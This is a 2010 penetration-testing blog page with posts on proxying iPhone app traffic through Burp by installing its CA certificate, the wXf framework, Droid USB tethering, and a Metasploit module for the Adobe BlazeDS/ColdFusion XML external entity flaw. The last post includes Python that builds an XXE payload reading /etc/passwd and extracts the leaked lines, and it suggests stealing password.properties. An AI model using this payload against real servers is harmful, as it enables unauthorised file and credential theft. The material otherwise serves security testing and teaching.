carnal0wnage [Shared Reader]

Tuesday, November 23, 2010

iPhone + Burp

This is one of those things that is super simple and I figure most folks have already done it or know how to do it. There may be a few people out there whose time I save with this post. Who knows. Let's get on with it.

Just as with the Droid apps, when an untrusted certificate (Burp's) is presented to an app that requires SSL/TLS, the handshake fails and the app crashes and burns. The best way (same as on the Droid) to fix this is to import Burp's CA certificate on the phone as a trusted Certificate Authority (CA).

Why would we want to do this? Apps on mobile phones are cool, but some would argue the web services the apps are talking to can be even juicier. We'd like to intercept the traffic to those web services and play around a bit.

You'll need to export the Burp CA certificate. I usually open Firefox, set the browser to proxy through Burp, view the certificate and export it. Much like this:

Browse to https://twitter.com (while proxying through Burp)

"Get Certificate"

Select PortSwigger's cert

Save the certificate with a .cer extension (.cer is what the iPhone recognizes)

Start a web server to host PortSwiggerCA.cer

From the iPhone, browse to the location of the PortSwiggerCA.cer file

The iPhone detects the .cer, asks you to install it as a CA, do it :-)

WiFi configuration: tap the blue arrow on the right of your network

Configure the HTTP proxy with Burp's IP and port. Burp's proxy listener has to be bound to an address the phone can reach (its default is 127.0.0.1 only), or the phone will never get a response.
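As an added example (not code from the original post), this script does the middle of the procedure above for you: it takes the certificate Firefox exported (PEM or already DER), writes it out as a DER .cer, sanity-checks that it is really a DER certificate, and serves the directory over plain HTTP bound to all interfaces so the phone on the WiFi can fetch it. The file names, the port, and the certificate bytes in the sanity check are placeholders; the MIME type is the standard one for a certificate file.

```python
"""Added example, not from the original post: export -> DER .cer -> serve.
File names, listen port and sample bytes are placeholders."""
import base64
import functools
import http.server
import re
import socketserver
import sys

PEM_BLOCK = re.compile(
    rb"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S)


def pem_to_der(data):
    """Return DER bytes from a PEM export; data that is already DER passes through."""
    match = PEM_BLOCK.search(data)
    if match:
        return base64.b64decode(b"".join(match.group(1).split()))
    return data


def looks_like_der_cert(der):
    """Cheap structural check: a DER certificate is one outer SEQUENCE (0x30)
    whose encoded length accounts for the whole file. Not a full X.509 parse."""
    if len(der) < 2 or der[0] != 0x30:
        return False
    first = der[1]
    if first < 0x80:                        # short-form length
        return 2 + first == len(der)
    n = first & 0x7F                        # long form: n length bytes follow
    if n == 0 or len(der) < 2 + n:
        return False
    length = int.from_bytes(der[2:2 + n], "big")
    return 2 + n + length == len(der)


def write_cer(src_path, dst_path):
    """Write the .cer the phone will download; refuse anything that isn't DER."""
    with open(src_path, "rb") as f:
        der = pem_to_der(f.read())
    if not looks_like_der_cert(der):
        raise ValueError("%s does not look like a DER certificate" % src_path)
    with open(dst_path, "wb") as f:
        f.write(der)
    return len(der)


class CertHandler(http.server.SimpleHTTPRequestHandler):
    # .cer is the extension the post says the iPhone recognizes; serve it with
    # the standard certificate MIME type rather than application/octet-stream.
    extensions_map = {**http.server.SimpleHTTPRequestHandler.extensions_map,
                      ".cer": "application/x-x509-ca-cert"}


def serve(directory, port):
    """Bind on all interfaces: the phone is on the WiFi, not on localhost."""
    handler = functools.partial(CertHandler, directory=directory)
    with socketserver.TCPServer(("0.0.0.0", port), handler) as httpd:
        httpd.serve_forever()


if __name__ == "__main__":
    # usage: python3 serve_ca.py burp_ca.pem PortSwiggerCA.cer [port]
    src, dst = sys.argv[1], sys.argv[2]
    port = int(sys.argv[3]) if len(sys.argv) > 3 else 8000
    print("wrote %d bytes to %s" % (write_cer(src, dst), dst))
    print("browse from the phone to http://<this host>:%d/%s" % (port, dst))
    serve(".", port)
```

Run it on the laptop that is running Burp, then point Mobile Safari at the .cer URL; the install prompt is the same one described above.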


Hopefully that was easy enough to follow along. Now you can proxy your iPhone apps thru Burp.

~Happy Hacking

Monday, November 22, 2010

wXf Videos from AppSec DC 2010

Here are some of the videos from AppSec DC 2010 and our presentation (Seth Law, Chris Gates and I) on wXf (Web Exploitation Framework).

Background: Back in March of this year, Seth approached me with the idea of creating a framework that would let us put all of our disparate scripts together. Then we decided "our" could mean the AppSec community as a whole. Why not take everyone's one-off scripts, proof-of-concept tools and ideas and centralize them? So we've worked off and on since March to build it.

The only frameworks available to us at the time (and even now) that were web-centric had user interfaces that weren't what we were looking for, broke after updates (or just randomly), or simply didn't have the HTTP libraries we needed (SOAP, JSON, Flex, etc.).

So the first thing we focused on was the console interface. We figure this will probably be the interface with the most mileage. At the moment, we are still working on the console interface as well as improving the core. The framework won't be perfect from day one but we'd like to make it as easy to use as possible.

We decided Metasploit is possibly the best-designed piece of open source software/framework that we've seen, and it works incredibly well. People are familiar with it and it looks nice. So we decided to make wXfconsole look like msfconsole: the same *general* type of commands and interface layout.

Release will occur in the next couple of months. We have a list of people to beta-test the software and want to keep the number of bugs to a minimum upon release.

Now, for the videos.

User Agent Fuzzer by Chris Gates (carnal0wnage) from cktricky on Vimeo.

wXf Directory Traversal Fuzzer by Chris Gates (carnal0wnage) from cktricky on Vimeo.

wXf Web Server Stack by Seth Law from cktricky on Vimeo.

Monday, November 8, 2010

Tethering Your Droid to a Linux System

Imagine my happiness when I got the Droid update and saw USB tethering available.

Then imagine my sadness turning to rage when VendorX wants to charge another 15 bucks to tether.

So, following the instructions from here, it is possible to tether via USB on Linux. Evidently PDAnet works great, but I don't use Windows except for PowerPoint and I can't afford a Mac.

So here's how to get it going if you don't want to click the link... plus I'll never remember that URL.

install Proxoid on your Droid (it runs an HTTP proxy on the phone, so only proxy-aware apps get out this way; it is not a full network tether)

download & extract the android sdk to your linux system

turn on Android USB debugging --> Applications --> Development --> USB debugging

turn on Proxoid

connect the USB cable

cg@c0:~$ cd android-sdk-linux_86/tools/

cg@c0:~/android-sdk-linux_86/tools$ sudo ./adb start-server

cg@c0:~/android-sdk-linux_86/tools$ ./adb forward tcp:8080 tcp:8080

Set your Firefox network settings to use localhost port 8080 and you can surf. You should also be able to send your whole system through the Droid if you set the system-wide network proxy to the same localhost:8080.

Saturday, November 6, 2010

Adobe XML Injection Metasploit Module

I just pushed out code coverage for the Adobe XML External Entity Injection vulnerability in multiple Adobe products, including: BlazeDS 3.2 and earlier versions; LiveCycle 9.0, 8.2.1, and 8.0.1; LiveCycle Data Services 3.0, 2.6.1, and 2.5.1; Flex Data Services 2.0.1; and ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2.

References Here:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3960
http://www.osvdb.org/62292
http://www.securityfocus.com/bid/38197
http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
http://www.adobe.com/support/security/bulletins/apsb10-05.html

I recommend you read security-assessment's PDF on it, it's good.

Anyway, it's a cool bug.
1 --> because it affects several products, although most people have probably never heard of most of them except for ColdFusion.
2 --> it's enabled by default on all those products you've never heard of, but not on ColdFusion, with the exception of CF 8, which appears to have it turned on by default.
3 --> you have to apply patches for CF individually and there is no automated process. Since this vuln got little media attention, I've seen a lot of hosts that are still missing this patch and/or haven't turned off the vulnerable service.

On with the demo!

So against a patched host, or one where someone has disabled the service in ColdFusion, you'll see one of two things: either 404s for the checks, or a 200 for /flex2gateway/ and a 500 for the http or https check.



If you get a bunch of 400s, you need to set VHOST.


When it works, you'll see something like this for /etc/passwd:

and like this when you ask for a file that doesn't exist or that the CF process doesn't have permission to read (since CF doesn't run as root on Linux, requesting /etc/shadow won't work) :-(

At this point you're probably thinking "so what?" Well, what's cool about arbitrary file read is that 1. it also works on Windows:

and 2. that whole password.properties attack is cool again, because you can just request that file too.
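As an added example (not the Metasploit module from the post), here is the triage logic the post describes for the three /flex2gateway/ checks, a generic XXE wrapper that puts an external-entity declaration in front of an XML request body, and a helper that pulls passwd-style lines out of whatever the server echoes back. The request body is a placeholder that only shows where the entity reference goes; the real AMFX message the module sends is not reproduced here, and the sample response is constructed.

```python
"""Added example, not the module from the post: check triage, XXE wrapping
and passwd extraction for the Adobe XML injection bug. Sample data is
constructed; the AMFX body is a placeholder, not the real message format."""
import re

CHECK_PATHS = ("/flex2gateway/", "/flex2gateway/http", "/flex2gateway/https")


def triage(status_by_path):
    """Map the HTTP status of each check path to a next step, following the
    post: 400s mean VHOST is wrong, all 404s or 200/500/500 mean the XML
    endpoints are patched, disabled or absent, a 200 on http/https means go."""
    codes = tuple(status_by_path.get(p) for p in CHECK_PATHS)
    if 400 in codes:
        return "set VHOST"
    if all(c == 404 for c in codes):
        return "not found: patched, disabled or not installed"
    if codes[0] == 200 and codes[1] == 500 and codes[2] == 500:
        return "gateway present but http/https endpoints disabled or patched"
    if codes[1] == 200 or codes[2] == 200:
        return "http/https endpoint answers: send the XXE probe"
    return "unexpected: %r" % (codes,)


# Placeholder body (assumption): the only property the probe relies on is
# that a string field referencing &xxe; is echoed back by the server.
PLACEHOLDER_BODY = ('<?xml version="1.0" encoding="utf-8"?>\n'
                    '<amfx ver="3"><body><string>&xxe;</string></body></amfx>')


def xxe_wrap(body_xml, target_file, entity="xxe"):
    """Prepend an external-entity declaration that reads target_file.
    body_xml must already reference &<entity>; somewhere the server echoes."""
    if ("&%s;" % entity) not in body_xml:
        raise ValueError("body does not reference &%s;" % entity)
    # Keep exactly one XML declaration, then the DOCTYPE, then the body.
    decl = '<?xml version="1.0" encoding="utf-8"?>\n'
    if body_xml.lstrip().startswith("<?xml"):
        body_xml = body_xml.split("?>", 1)[1].lstrip()
    doctype = '<!DOCTYPE x [ <!ENTITY %s SYSTEM "%s"> ]>\n' % (entity, target_file)
    return decl + doctype + body_xml


# name:passwd:uid:gid:gecos:/home:shell  (Linux only; Windows files such as
# win.ini just have to be read out of the response by eye)
PASSWD_LINE = re.compile(
    r"[A-Za-z_][\w.-]*:[^:\s<]*:\d+:\d+:[^:\n<]*:/[^:\n<]*:[^\s<]*")


def extract_passwd(response_body):
    """Return the passwd-format lines echoed back in the response, in order.
    An empty list is what you get for a missing or unreadable file."""
    return PASSWD_LINE.findall(response_body)


# Constructed response, shaped like an echo of the probe above.
SAMPLE_RESPONSE = ('<amfx ver="3"><body><string>'
                   'root:x:0:0:root:/root:/bin/bash\n'
                   'bin:x:1:1:bin:/bin:/sbin/nologin\n'
                   '</string></body></amfx>')

if __name__ == "__main__":
    print(triage({"/flex2gateway/": 200, "/flex2gateway/http": 200,
                  "/flex2gateway/https": 200}))
    print(xxe_wrap(PLACEHOLDER_BODY, "file:///etc/passwd"))
    print(extract_passwd(SAMPLE_RESPONSE))
```

For the Windows case swap the SYSTEM URI for something like file:///C:/Windows/win.ini and read the body directly; extract_passwd only knows the Linux passwd layout.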


-CG